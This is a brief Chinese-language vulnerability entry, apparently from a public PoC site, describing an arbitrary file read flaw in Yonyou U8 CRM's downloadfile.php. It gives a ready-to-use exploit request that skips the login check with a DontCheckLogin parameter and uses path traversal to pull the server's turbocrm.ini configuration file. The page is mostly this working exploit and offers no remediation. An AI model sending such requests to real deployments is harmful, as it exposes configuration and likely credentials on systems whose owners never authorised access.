用友U8CRM downloadfile 任意文件读取漏洞

2024-02-21 用友U8+ PoC Public

Description

用友U8CRM downloadfile.php存在文件读取漏洞,攻击者可利用此漏洞获取服务器敏感信息

PoC

GET /pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../tsvr/turbocrm.ini HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities